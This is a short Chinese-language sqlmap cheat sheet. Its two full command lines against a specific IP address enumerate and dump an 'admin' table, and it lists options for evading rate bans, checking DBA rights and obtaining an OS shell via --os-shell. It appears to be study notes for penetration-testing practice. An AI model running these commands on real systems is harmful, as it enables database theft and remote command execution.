Sqlmap
- --dbs =>获得库名
- python sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs
- -D =>指定库
- --tables =>表
- -T =>指定表
- --columns =>字段
- -C =>指定字段
- --dump =>获取数据库中的数据(高危命令)脱库
- python sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin --dump
- 常见指令
- --random-agent =>选择随机user-agents头
- --delay=1 =>每次探测延时1秒(防止访问过快被ban)
- --count =>查看数据量
- --level =>测试等级
- --risk =>sqlmap语句复杂度 (--level 3 --risk 2)
- --is-dba =>检测注入点的数据库权限
- --os-shell =>直接获得目标的cmd权限(必须is-dba为true)